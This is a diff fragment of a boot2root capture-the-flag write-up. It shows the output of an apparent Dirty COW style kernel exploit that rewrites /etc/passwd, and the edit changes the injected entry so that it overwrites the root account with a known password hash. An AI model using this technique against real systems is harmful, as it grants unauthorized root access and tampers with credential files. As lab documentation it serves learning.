nirae/boot2root/writeup1.md

 Please enter the new password: q

 Complete line:
-easywin:fi86Ixhn/lTi2:0:0:pwned:/root:/bin/bash
+root:fi86Ixhn/lTi2:0:0:pwned:/root:/bin/bash

 mmap: b7fda000
 madvise 0

 ptrace 0
 Done!
-Check /etc/passwd to see if the new user was created.
+Check /etc/passwd to see if the new user was created and overwrite the original root.
-You can log in with the username 'easywin' and the password 'q'.
+You can log in with the username 'root' and the password 'q'.

 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd